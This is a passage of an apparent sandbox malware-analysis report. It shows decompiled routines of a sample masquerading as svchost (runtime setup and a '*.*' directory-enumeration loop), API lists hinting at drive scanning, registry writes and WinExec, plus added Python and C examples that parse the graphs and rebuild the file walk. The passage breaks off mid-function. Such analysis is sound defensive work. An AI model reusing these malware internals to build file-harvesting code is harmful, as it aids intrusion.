                                                                          						__eflags = _t33;
                                                                          						if(__eflags != 0) {
                                                                          							__eflags = InterlockedDecrement(_t33);
                                                                          							if(__eflags == 0) {
                                                                          								__eflags = _t33 - 0xdff6b0;
                                                                          								if(__eflags != 0) {
                                                                          									E00DF2E06(_t33);
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          						_t20 =  *0xdff3b0; // 0x17dc460
                                                                          						 *(_t31 + 0x68) = _t20;
                                                                          						_t33 =  *0xdff3b0; // 0x17dc460
                                                                          						 *(_t34 - 0x1c) = _t33;
                                                                          						InterlockedIncrement(_t33);
                                                                          					}
                                                                          					 *(_t34 - 4) = 0xfffffffe;
                                                                          					E00DF3648();
                                                                          				} else {
                                                                          					_t33 =  *(_t31 + 0x68);
                                                                          				}
                                                                          				_t38 = _t33;
                                                                          				if(_t33 == 0) {
                                                                          					E00DF19F8(_t24, _t29, _t31, _t33, _t38, 0x20);
                                                                          				}
                                                                          				return E00DF2A45(_t33);
                                                                          			}









                                                                          Listing address range: 0x00df35ac - 0x00df363e

                                                                          APIs
                                                                            • Part of subcall function 00DF17E3: __getptd_noexit.LIBCMT ref: 00DF17E4
                                                                          • __lock.LIBCMT ref: 00DF35E9
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 00DF3606
                                                                          • _free.LIBCMT ref: 00DF3619
                                                                          • InterlockedIncrement.KERNEL32(017DC460), ref: 00DF3631
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
                                                                          • Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                          • String ID:
                                                                          • API String ID: 2704283638-0
                                                                          • Opcode ID: 8a02c6ffab32323a6606b3097e9edbd18056756b63cdbbee7e2a34ff71feaedf
                                                                          • Instruction ID: ccab88107854517d8f795a656e5b07806b70c496eaeccb6236709eb58f5f9f96
                                                                          • Opcode Fuzzy Hash: 8a02c6ffab32323a6606b3097e9edbd18056756b63cdbbee7e2a34ff71feaedf
                                                                          • Instruction Fuzzy Hash: 0D015B32A01759ABCB21AB64980577DB760BF00B10F1BC115EB14E7395CB349A41CBF5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 91%
                                                                          			// CRT per-thread data initialisation, not sample logic: fills the thread-data block passed in (+0x5c handler table, +0x70 "owns locale" flag, two 'C' locale-name cache entries), references the static locale-info block 0xdff6b0 under __lock(0xd), then under __lock(0xc) stores the multibyte code-page info (the argument, or the global default read from 0xdff2ec) and registers it with ___addlocaleref.
                                                                          			E00DF186A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                          				short _t23;
                                                                          				intOrPtr _t28;
                                                                          				intOrPtr _t32;
                                                                          				intOrPtr _t41;
                                                                          				void* _t42;
                                                                          
                                                                          				_push(8);
                                                                          				_push(0xdfd728);
                                                                          				E00DF2A00(__ebx, __edi, __esi);
                                                                          				_t41 =  *((intOrPtr*)(_t42 + 8));
                                                                          				 *((intOrPtr*)(_t41 + 0x5c)) = 0xdf91c0;
                                                                          				 *(_t41 + 8) =  *(_t41 + 8) & 0x00000000;
                                                                          				 *((intOrPtr*)(_t41 + 0x14)) = 1;
                                                                          				 *((intOrPtr*)(_t41 + 0x70)) = 1;
                                                                          				_t23 = 0x43;
                                                                          				 *((short*)(_t41 + 0xb8)) = _t23;
                                                                          				 *((short*)(_t41 + 0x1be)) = _t23;
                                                                          				 *(_t41 + 0x68) = 0xdff6b0;
                                                                          				 *(_t41 + 0x3b8) =  *(_t41 + 0x3b8) & 0x00000000;
                                                                          				E00DF2C8D(0xd);
                                                                          				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
                                                                          				InterlockedIncrement( *(_t41 + 0x68));
                                                                          				 *(_t42 - 4) = 0xfffffffe;
                                                                          				E00DF190B();
                                                                          				E00DF2C8D(0xc);
                                                                          				 *(_t42 - 4) = 1;
                                                                          				_t28 =  *((intOrPtr*)(_t42 + 0xc));
                                                                          				 *((intOrPtr*)(_t41 + 0x6c)) = _t28;
                                                                          				if(_t28 == 0) {
                                                                          					_t32 =  *0xdff2ec; // 0xdff2f0
                                                                          					 *((intOrPtr*)(_t41 + 0x6c)) = _t32;
                                                                          				}
                                                                          				E00DF2F1D( *((intOrPtr*)(_t41 + 0x6c)));
                                                                          				 *(_t42 - 4) = 0xfffffffe;
                                                                          				return E00DF2A45(E00DF1914());
                                                                          			}








                                                                          Listing address range: 0x00df186a - 0x00df1904

                                                                          APIs
                                                                          • __lock.LIBCMT ref: 00DF18AE
                                                                            • Part of subcall function 00DF2C8D: __mtinitlocknum.LIBCMT ref: 00DF2C9F
                                                                            • Part of subcall function 00DF2C8D: EnterCriticalSection.KERNEL32(00000000,?,00DF18B3,0000000D), ref: 00DF2CB8
                                                                          • InterlockedIncrement.KERNEL32(?), ref: 00DF18BB
                                                                          • __lock.LIBCMT ref: 00DF18CF
                                                                          • ___addlocaleref.LIBCMT ref: 00DF18ED
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
                                                                          • Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                          • String ID:
                                                                          • API String ID: 1687444384-0
                                                                          • Opcode ID: fb886a6e2c569254b8ffeb025477a6c9f2a746890017df242776521816af68ca
                                                                          • Instruction ID: e03e605c7535ef9bd4782cc0d5e7e16f34d0ae83055f8bb40517b6adc59ecbec
                                                                          • Opcode Fuzzy Hash: fb886a6e2c569254b8ffeb025477a6c9f2a746890017df242776521816af68ca
                                                                          • Instruction Fuzzy Hash: 89013C75400709AED7209FA5C805769B7F0EF54321F21C90EE6AA963A1CB70A644CF74
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Execution Graph

                                                                          Execution Coverage:10.2%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:883
                                                                          Total number of Limit Nodes:7

                                                                          Graph

[Execution graph: the report emits the 883-node graph as one run-on `execution_graph` token stream (node id, function address, resolved API names or "<N> API calls" for collapsed callees, and `a->b` edges). The raw edge list is omitted here; the Windows APIs it resolves, grouped by subsystem, are:
• Process and module: GetModuleHandleA, GetModuleFileNameA, GetCommandLineA, GetLastError, FreeLibrary, ExitProcess, WinExec
• Drive and directory enumeration: GetLogicalDriveStringsA, GetDriveTypeA, GetWindowsDirectoryA, GetTempPathA, CreateDirectoryA, GetShortPathNameA, FindFirstFileA, FindNextFileA, FindClose
• File I/O and attributes: CreateFileA, ReadFile, WriteFile, SetFilePointer, SetEndOfFile, GetFileSize, CloseHandle, DeleteFileA, GetFileAttributesA, SetFileAttributesA
• Registry: RegOpenKeyExA, RegSetValueExA, RegCloseKey
• Synchronisation and memory: CreateMutexA, ReleaseMutex, RtlInitializeCriticalSection, RtlEnterCriticalSection, RtlLeaveCriticalSection, LocalAlloc, VirtualAlloc, VirtualFree, TlsGetValue, TlsSetValue
• Icon and GDI handling: ExtractIconA, GetIconInfo, CopyImage, GetObjectA, DeleteObject, DestroyCursor
• Other: GetLocalTime, GetStdHandle, MessageBoxA, SysFreeString, SysReAllocStringLen
• Call targets the plugin could not resolve to a name: 72E7AC50, 72E7A520, 72E7A7A0, 72E7B380]

                                                                          Executed Functions

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
control_flow_graph for E00405634 (block id: address range, calls and APIs → successor blocks):
• 267: 405634-405659, call 4052d8, call 40456c, call 4030e8 → 274, 275
• 274: 40574c-405759, call 404520 → (none)
• 275: 40565f-40566f, call 404db8 → 280, 281
• 280: 405671-40568a, call 405c80, call 4048d8 → 290, 291
• 281: 4056a9-4056e7, call 405300, call 403258, call 4044a8, FindFirstFileA, call 403094 → 298, 299
• 290: 405691-405699, call 405cac → 281
• 291: 40568c → 290
• 298: 405746 → 274
• 299: 4056e9-4056fc, call 40536c → 302, 303
• 302: 405735-40573e, FindNextFileA → 299, 304
• 303: 4056fe-405701 → 305, 306
• 304: 405740-405741, FindClose → 298
• 305: 405703-405713 → 302, 310
• 306: 405717-405730, call 402448, call 4045e8, call 40254c → 302
• 310: 405715 → 298, 306
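Joe Sandbox emits both the execution graph and the per-function control-flow graph as one whitespace-separated token stream, which is hard to read but easy to parse. The script below is an added example (not Joe Sandbox code and not from the sample) that tokenises such a stream into nodes, labels and edges, builds a per-address inventory of resolved Win32 APIs, and answers "which APIs does this function reach?" with a breadth-first walk over the edges. Run over the E00405634 control-flow graph it returns exactly the FindFirstFileA / FindNextFileA / FindClose triple, i.e. the directory-walk loop formed by blocks 299, 302, 303, 305, 306 and 310. The token grammar (node id, address or address range, `call <addr>`, `<N> API calls`, bare API names, `a->b` edges) is inferred from the dumps on this page and is an assumption, not a documented format; the two sample inputs are excerpts copied from this report.

```python
"""Parse Joe Sandbox execution_graph / control_flow_graph text dumps.
Added example for this report page; the token grammar is inferred from the
page's dumps (assumption), not a documented Joe Sandbox format."""
import re
from collections import defaultdict, deque

NODE_ID = re.compile(r"^\d{1,5}$")                            # node / block id
ADDR = re.compile(r"^[0-9a-fA-F]{6,8}(-[0-9a-fA-F]{6,8})?$")  # address or range
API_NAME = re.compile(r"^[A-Za-z_]\w*$")
HEADERS = {"execution_graph", "control_flow_graph"}


def parse_graph(text):
    """Return (nodes, labels, edges): node id -> start address,
    node id -> labels (API names, 'call <addr>', '<N API calls>',
    '<unresolved X>'), node id -> set of successor node ids."""
    tokens = text.split()
    nodes, labels, edges = {}, defaultdict(list), defaultdict(set)
    current, i = None, 0
    while i < len(tokens):
        tok = tokens[i]
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if "->" in tok:                                       # edge a->b
            src, dst = tok.split("->", 1)
            edges[src].add(dst)
            i += 1
        elif NODE_ID.match(tok) and ADDR.match(nxt):          # new node / block
            current = tok
            nodes[tok] = nxt.split("-")[0].lower()            # keep range start
            i += 2
        elif tok.isdigit() and tokens[i + 1:i + 3] == ["API", "calls"]:
            labels[current].append(f"<{tok} API calls>")      # collapsed callee
            i += 3
        elif tok == "call" and ADDR.match(nxt):               # intra-binary call
            labels[current].append(f"call {nxt.lower()}")
            i += 2
        elif current is not None and API_NAME.match(tok) and tok not in HEADERS:
            labels[current].append(tok)                       # resolved Win32 API
            i += 1
        elif current is not None and re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
            labels[current].append(f"<unresolved {tok}>")     # bare import VA
            i += 1
        else:
            i += 1
    return nodes, labels, edges


def _is_api(label):
    return not label.startswith(("<", "call "))


def api_inventory(nodes, labels):
    """Function (or block start) address -> sorted Win32 API names on it."""
    inv = defaultdict(set)
    for nid, addr in nodes.items():
        inv[addr].update(l for l in labels.get(nid, []) if _is_api(l))
    return {a: sorted(s) for a, s in inv.items() if s}


def collapsed_calls(nodes, labels):
    """Address -> API-call count for callees the sandbox collapsed to '<N API calls>'."""
    out = {}
    for nid, addr in nodes.items():
        for l in labels.get(nid, []):
            m = re.fullmatch(r"<(\d+) API calls>", l)
            if m:
                out[addr] = int(m.group(1))
    return out


def reachable_apis(start, labels, edges):
    """Win32 APIs reachable from node id `start` by following edges (BFS)."""
    seen, queue, found = {start}, deque([start]), set()
    while queue:
        n = queue.popleft()
        found.update(l for l in labels.get(n, []) if _is_api(l))
        for m in edges.get(n, ()):
            if m not in seen:
                seen.add(m)
                queue.append(m)
    return sorted(found)


# Constructed excerpt of this report's execution_graph dump (ids and addresses
# copied from the page; the sandbox emits the whole graph on one line).
EXEC_GRAPH_EXCERPT = """execution_graph 9492 4080e4 9521 403f14 GetModuleHandleA 9492->9521
9509 4049d0 27 API calls 9511 4081c3 9509->9511 9538 404ad9 9544 404f6c FindFirstFileA
9538->9544 9545 404f87 9544->9545 9546 404f7c FindClose 9544->9546 9546->9545
9677 4075e3 GetLastError 9677->9672 9677->9678 9678 4075f1 10504 406d40
GetLogicalDriveStringsA 9678->10504 10507 406d93 10504->10507 10505 406de3
10506 406d79 GetDriveTypeA 10506->10507 10507->10505 10507->10506
10303 405feb 72E7AC50 72E7A520 72E7B380 10303->10302"""

# The control_flow_graph dump for E00405634, copied from this report.
CFG_DUMP = """control_flow_graph 267 405634-405659 call 4052d8 call 40456c call 4030e8
274 40574c-405759 call 404520 267->274 275 40565f-40566f call 404db8 267->275
280 405671-40568a call 405c80 call 4048d8 275->280 281 4056a9-4056e7 call 405300
call 403258 call 4044a8 FindFirstFileA call 403094 275->281 290 405691-405699
call 405cac 280->290 291 40568c 280->291 298 405746 281->298 299 4056e9-4056fc
call 40536c 281->299 290->281 291->290 298->274 302 405735-40573e FindNextFileA
299->302 303 4056fe-405701 299->303 302->299 304 405740-405741 FindClose 302->304
305 405703-405713 303->305 306 405717-405730 call 402448 call 4045e8 call 40254c
303->306 304->298 305->302 310 405715 305->310 306->302 310->298 310->306"""

if __name__ == "__main__":
    n, l, e = parse_graph(EXEC_GRAPH_EXCERPT)
    for addr, apis in sorted(api_inventory(n, l).items()):
        print(addr, ", ".join(apis))
    print("collapsed:", collapsed_calls(n, l))
    print("reachable from 9677:", reachable_apis("9677", l, e))
    cn, cl, ce = parse_graph(CFG_DUMP)
    print("E00405634 reaches:", reachable_apis("267", cl, ce))
```

Because many execution-graph nodes share one function address (4049d0 appears as a dozen collapsed "27 API calls" nodes), the inventory keys on address rather than node id, so repeated call sites collapse into one entry; collapsed callees carry no names and are reported separately by `collapsed_calls` so they are not mistaken for API-free code.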
                                                                          C-Code - Quality: 61%
                                                                          			E00405634(void* __eax, intOrPtr __ecx, void* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                          				char _v292;
                                                                          				char _v336;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __ebp;
                                                                          				CHAR* _t38;
                                                                          				void* _t39;
                                                                          				void* _t44;
                                                                          				int _t45;
                                                                          				intOrPtr _t56;
                                                                          				intOrPtr _t57;
                                                                          				void* _t58;
                                                                          				void* _t60;
                                                                          				void* _t63;
                                                                          				void* _t69;
                                                                          				void* _t70;
                                                                          				void* _t80;
                                                                          				void* _t82;
                                                                          				void* _t83;
                                                                          				void* _t84;
                                                                          				void* _t85;
                                                                          				void* _t86;
                                                                          				struct _WIN32_FIND_DATAA* _t87;
                                                                          
                                                                          				_t85 = __esi;
                                                                          				_t70 = __edx;
                                                                          				_t61 = __ecx;
                                                                          				_t60 = __eax;
                                                                          				asm("pushad");
                                                                          				E004052D8(__eax);
                                                                          				 *((intOrPtr*)(_t60 + 0x18)) = E0040456C();
                                                                          				asm("popad");
                                                                          				asm("pushad");
                                                                          				_t2 = _t60 + 0x1c; // 0x1c
                                                                          				E004030E8(_t2, _t70);
                                                                          				asm("popad");
                                                                          				if( *((intOrPtr*)(_t60 + 0x1c)) != 0) {
                                                                          					asm("pushad");
                                                                          					_t4 = _t60 + 0x1c; // 0x1c
                                                                          					E00404DB8( *_t4, _t4);
                                                                          					_t32 =  *((intOrPtr*)(_t60 + 0x20));
                                                                          					if( *((intOrPtr*)(_t60 + 0x20)) == 0) {
                                                                          						_t56 = E00405C80();
                                                                          						 *((intOrPtr*)(_t60 + 0x20)) = _t56;
                                                                          						asm("popad");
                                                                          						asm("pushad");
                                                                          						_t57 = _t61;
                                                                          						_t61 = _t56;
                                                                          						_t58 = E004048D8(_t57, _t56, 0x40569b);
                                                                          						_t82 = _t61;
                                                                          						if(_t58 == 0) {
                                                                          							_t82 = E004056A7;
                                                                          						}
                                                                          						_t32 = E00405CAC( *((intOrPtr*)(_t60 + 0x20)), _t82);
                                                                          					}
                                                                          					asm("popad");
                                                                          					_t87 = _t86 + 0xfffffec0;
                                                                          					_push(0);
                                                                          					_push(0);
                                                                          					E00405300(_t61, _t60, _t32, _t87, _t83, _t85);
                                                                          					_pop(_t63);
                                                                          					E00403258( &_v336, _t63,  *((intOrPtr*)(_t60 + 0x1c)));
                                                                          					E004044A8();
                                                                          					_t38 = _t63;
                                                                          					_push(_t38);
                                                                          					_t39 = FindFirstFileA(_t38, _t87); // executed
                                                                          					_t84 = _t39;
                                                                          					asm("pushfd");
                                                                          					E00403094(_t87);
                                                                          					asm("popfd");
                                                                          					if(_t39 + 1 != 0) {
                                                                          						do {
                                                                          							_t44 = E0040536C(_t60, _t60, _v336,  &_v292, _t84, _t85, _a4); // executed
                                                                          							if(_t44 != 0) {
                                                                          								asm("jecxz 0x16");
                                                                          								 *((intOrPtr*)(_t60 + 0x24))(_t87, 1);
                                                                          								asm("jecxz 0x22");
                                                                          								asm("loop 0x31");
                                                                          								_push(E00402448(0x140));
                                                                          								E004045E8( *((intOrPtr*)(_t60 + 0x18)), _t50);
                                                                          								_pop(_t80);
                                                                          								_t69 = 0x140;
                                                                          								E0040254C(_t87, _t69, _t80);
                                                                          							}
                                                                          							_t45 = FindNextFileA(_t84, _t87); // executed
                                                                          						} while (_t45 != 0);
                                                                          						FindClose(_t84); // executed
                                                                          					}
                                                                          				}
                                                                          				 *((intOrPtr*)(_t60 + 0x20)) = 0;
                                                                          				return E00404520( *((intOrPtr*)(_t60 + 0x20)));
                                                                          			}
                                                                          0x00405634
                                                                          0x00405634
                                                                          0x00405634
                                                                          0x00405639
                                                                          0x0040563b
                                                                          0x0040563c
                                                                          0x00405646
                                                                          0x00405649
                                                                          0x0040564a
                                                                          0x0040564b
                                                                          0x0040564e
                                                                          0x00405653
                                                                          0x00405659
                                                                          0x0040565f
                                                                          0x00405660
                                                                          0x00405665
                                                                          0x0040566a
                                                                          0x0040566f
                                                                          0x00405671
                                                                          0x00405676
                                                                          0x00405679
                                                                          0x0040567a
                                                                          0x0040567c
                                                                          0x0040567c
                                                                          0x00405682
                                                                          0x00405689
                                                                          0x0040568a
                                                                          0x0040568c
                                                                          0x0040568c
                                                                          0x00405694
                                                                          0x00405694
                                                                          0x004056a9
                                                                          0x004056aa
                                                                          0x004056b2
                                                                          0x004056b3
                                                                          0x004056b7
                                                                          0x004056c3
                                                                          0x004056c5
                                                                          0x004056ca
                                                                          0x004056cf
                                                                          0x004056d2
                                                                          0x004056d5
                                                                          0x004056da
                                                                          0x004056df
                                                                          0x004056e0
                                                                          0x004056e5
                                                                          0x004056e7
                                                                          0x004056e9
                                                                          0x004056f5
                                                                          0x004056fc
                                                                          0x00405701
                                                                          0x0040570f
                                                                          0x00405713
                                                                          0x00405715
                                                                          0x00405722
                                                                          0x00405727
                                                                          0x0040572c
                                                                          0x0040572d
                                                                          0x00405730
                                                                          0x00405730
                                                                          0x00405737
                                                                          0x0040573c
                                                                          0x00405741
                                                                          0x00405741
                                                                          0x00405746
                                                                          0x0040574e
                                                                          0x00405759

                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA,00000000,0040758B), ref: 004056D5
                                                                          • FindNextFileA.KERNEL32(00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA), ref: 00405737
                                                                          • FindClose.KERNEL32(00000000,00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000), ref: 00405741
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID: *.*
                                                                          • API String ID: 3541575487-438819550
                                                                          • Opcode ID: 00d3b479303e5d62243bd7637ae4d1c4a154d51cbac2d1721687722865f048cd
                                                                          • Instruction ID: e0bf5d45d2763b4aada85c2368977cee553341535aa4efecd7ed3e039fa03a50
                                                                          • Opcode Fuzzy Hash: 00d3b479303e5d62243bd7637ae4d1c4a154d51cbac2d1721687722865f048cd
                                                                          • Instruction Fuzzy Hash: 513188B53005006BD705BF26998295B3799DFC5328B60847FB904EB2C7EA7DDC018E99
Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          control_flow_graph 384 4056a7-4056e7 call 405300 call 403258 call 4044a8 FindFirstFileA call 403094 394 405746-405759 call 404520 384->394 395 4056e9-4056fc call 40536c 384->395 401 405735-40573e FindNextFileA 395->401 402 4056fe-405701 395->402 401->395 403 405740-405741 FindClose 401->403 404 405703-405713 402->404 405 405717-405730 call 402448 call 4045e8 call 40254c 402->405 403->394 404->401 409 405715 404->409 405->401 409->394 409->405
                                                                          C-Code - Quality: 57%
                                                                          			E004056A7(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                                          				void* _t14;
                                                                          				CHAR* _t20;
                                                                          				void* _t21;
                                                                          				void* _t29;
                                                                          				int _t30;
                                                                          				void* _t41;
                                                                          				void* _t45;
                                                                          				void* _t51;
                                                                          				void* _t60;
                                                                          				void* _t62;
                                                                          				void* _t65;
                                                                          				void* _t67;
                                                                          				struct _WIN32_FIND_DATAA* _t68;
                                                                          
                                                                          				_t64 = __esi;
                                                                          				_t41 = __ebx;
                                                                          				_t14 = __eax -  *__eax;
                                                                          				asm("popad");
                                                                          				_t68 = _t67 + 0xfffffec0;
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				E00405300(__ecx, __ebx, _t14, _t68, __edi, __esi);
                                                                          				_pop(_t45);
                                                                          				E00403258( &(_t68->ftCreationTime), _t45,  *((intOrPtr*)(__ebx + 0x1c)));
                                                                          				E004044A8();
                                                                          				_t20 = _t45;
                                                                          				_push(_t20);
                                                                          				_t21 = FindFirstFileA(_t20, _t68); // executed
                                                                          				_t62 = _t21;
                                                                          				asm("pushfd");
                                                                          				E00403094(_t68);
                                                                          				asm("popfd");
                                                                          				if(_t21 + 1 != 0) {
                                                                          					do {
                                                                          						_t29 = E0040536C(_t41, _t41, _t68->dwFileAttributes,  &(_t68->cFileName[4]), _t62, _t64,  *((intOrPtr*)(_t65 + 8))); // executed
                                                                          						if(_t29 != 0) {
                                                                          							asm("jecxz 0x16");
                                                                          							 *((intOrPtr*)(_t41 + 0x24))(_t68, 1);
                                                                          							asm("jecxz 0x22");
                                                                          							asm("loop 0x31");
                                                                          							_push(E00402448(0x140));
                                                                          							E004045E8( *((intOrPtr*)(_t41 + 0x18)), _t35);
                                                                          							_pop(_t60);
                                                                          							_t51 = 0x140;
                                                                          							E0040254C(_t68, _t51, _t60);
                                                                          						}
                                                                          						_t30 = FindNextFileA(_t62, _t68); // executed
                                                                          					} while (_t30 != 0);
                                                                          					FindClose(_t62); // executed
                                                                          				}
                                                                          				 *((intOrPtr*)(_t41 + 0x20)) = 0;
                                                                          				return E00404520( *((intOrPtr*)(_t41 + 0x20)));
                                                                          			}
                                                                          0x004056a7
                                                                          0x004056a7
                                                                          0x004056a7
                                                                          0x004056a9
                                                                          0x004056aa
                                                                          0x004056b2
                                                                          0x004056b3
                                                                          0x004056b7
                                                                          0x004056c3
                                                                          0x004056c5
                                                                          0x004056ca
                                                                          0x004056cf
                                                                          0x004056d2
                                                                          0x004056d5
                                                                          0x004056da
                                                                          0x004056df
                                                                          0x004056e0
                                                                          0x004056e5
                                                                          0x004056e7
                                                                          0x004056e9
                                                                          0x004056f5
                                                                          0x004056fc
                                                                          0x00405701
                                                                          0x0040570f
                                                                          0x00405713
                                                                          0x00405715
                                                                          0x00405722
                                                                          0x00405727
                                                                          0x0040572c
                                                                          0x0040572d
                                                                          0x00405730
                                                                          0x00405730
                                                                          0x00405737
                                                                          0x0040573c
                                                                          0x00405741
                                                                          0x00405741
                                                                          0x0040574e
                                                                          0x00405759

                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA,00000000,0040758B), ref: 004056D5
                                                                          • FindNextFileA.KERNEL32(00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA), ref: 00405737
                                                                          • FindClose.KERNEL32(00000000,00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000), ref: 00405741
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID:
                                                                          • API String ID: 3541575487-0
                                                                          • Opcode ID: 4427aa859411e4304098e8c764b4f1325ec2cbe1500f1084358bf376df50b64d
                                                                          • Instruction ID: f2b03bfa0ad8d059d80b67f6c6517dce38b4ab09ecbfd790616c6b691a452e24
                                                                          • Opcode Fuzzy Hash: 4427aa859411e4304098e8c764b4f1325ec2cbe1500f1084358bf376df50b64d
                                                                          • Instruction Fuzzy Hash: 0E1181B53005006BD605BB269D8296B3759DBC5328B10843FBA04EB2C7DA3DCC029A99
Uniqueness Score: -1.00%
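The two listings above are one routine, not two. E004056A7 begins with asm("popad") and covers 0x004056a7 to 0x00405759, addresses the E00405634 listing already contains, and E00405634 uses that address as a jump target (_t82 = E004056A7), so the decompiler split the enumeration loop off the function that sets it up. Read together, the routine appends the "*.*" string (String ID above) to a directory path, calls FindFirstFileA, and for every record accepted by the helper E0040536C it calls the function pointer at +0x24, allocates 0x140 bytes with E00402448 (0x140 is sizeof(WIN32_FIND_DATAA)), copies the record into that block with E0040254C and appends it with E004045E8 to the list created at +0x18, until FindNextFileA fails and FindClose ends the walk. The C below is an added reconstruction of that pattern written for this page; it is not the sample's code and not Joe Sandbox output. The filter criteria (the listing only shows that E0040536C is consulted per entry), the reduced record type, the fixture and every name in the block (entry_t, ext_filter, append_if_accepted, enumerate_dir, build_fixture) are assumptions, and the +0x24 callback is omitted. On Windows it issues the same three Find* calls; elsewhere it falls back to opendir/readdir so it can be compiled and run anywhere.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#include <direct.h>
#define MKDIR(p) _mkdir(p)
#define IEQ(a, b) (_stricmp((a), (b)) == 0)     /* Win32 file names are case-insensitive */
#else
#include <dirent.h>
#include <strings.h>
#include <sys/stat.h>
#define MKDIR(p) mkdir((p), 0700)
#define IEQ(a, b) (strcasecmp((a), (b)) == 0)
#endif

/* Portable subset of the 0x140-byte WIN32_FIND_DATAA record the sample copies whole. */
typedef struct entry {
    char name[260];                 /* cFileName is CHAR[260] in WIN32_FIND_DATAA */
    int is_dir;
    struct entry *next;
} entry_t;
/* Per-entry predicate, the role E0040536C plays in the listing (signature assumed). */
typedef int (*filter_fn)(const char *name, int is_dir, void *ctx);

/* Assumed filter: plain files whose extension is in a NULL-terminated list. */
int ext_filter(const char *name, int is_dir, void *ctx) {
    const char **exts = (const char **)ctx;
    const char *dot = strrchr(name, '.');
    if (is_dir || dot == NULL) return 0;
    for (; *exts != NULL; ++exts)
        if (IEQ(dot + 1, *exts)) return 1;
    return 0;
}

/* "." and ".." come back from FindFirstFileA("*.*") and readdir() alike: skip them, run the
 * filter, then copy an accepted entry to a fresh heap node (the sample's 0x140-byte copy). */
static void append_if_accepted(const char *name, int is_dir, filter_fn filter,
                               void *ctx, entry_t ***tail, size_t *count) {
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0) return;
    if (!filter(name, is_dir, ctx)) return;
    entry_t *e = calloc(1, sizeof *e);
    if (e == NULL) return;
    snprintf(e->name, sizeof e->name, "%s", name);
    e->is_dir = is_dir;
    **tail = e;
    *tail = &e->next;
    ++*count;
}

/* Enumerate one directory, non-recursively like the listed routine; *count gets the length. */
entry_t *enumerate_dir(const char *dir, filter_fn filter, void *ctx, size_t *count) {
    entry_t *head = NULL, **tail = &head;
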